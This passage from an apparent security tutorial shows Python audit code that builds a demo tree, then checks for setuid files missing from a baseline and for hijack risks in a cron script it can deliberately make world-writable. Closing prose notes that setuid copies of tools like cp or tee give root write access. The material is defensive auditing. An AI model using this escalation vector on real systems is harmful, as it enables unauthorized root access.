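    with open(script, "w") as f:
        f.write("#!/bin/sh\n# placeholder for the cron-run script\n")
    os.chmod(script, 0o777 if weaken_script else 0o755)
    return root


def audit_demo(weaken_script=False):
    """Run both checks against a fresh demo tree. The tree's files are owned by
    whoever runs this, so that uid is treated as trusted in place of root."""
    root = build_demo_tree(weaken_script)
    unexpected = unexpected_setuid(root, SUID_BASELINE, prefix=root)
    issues = script_hijack_risks(os.path.join(root, "var/www/maintenance.sh"),
                                 trusted_uids=(os.getuid(),))
    return sorted(unexpected), issues


if __name__ == "__main__":
    unexpected, issues = audit_demo()
    print("setuid files not in baseline:", unexpected)   # ['/usr/bin/cp']
    print("maintenance.sh issues:", issues or "none")
```

On a real host, `unexpected_setuid("/", baseline)` is the check to schedule, with the baseline regenerated from a clean image whenever packages change; any setuid copy of a general-purpose file tool (`cp`, `mv`, `tee`, an editor) is a root write primitive regardless of how carefully the cron scripts themselves are locked down.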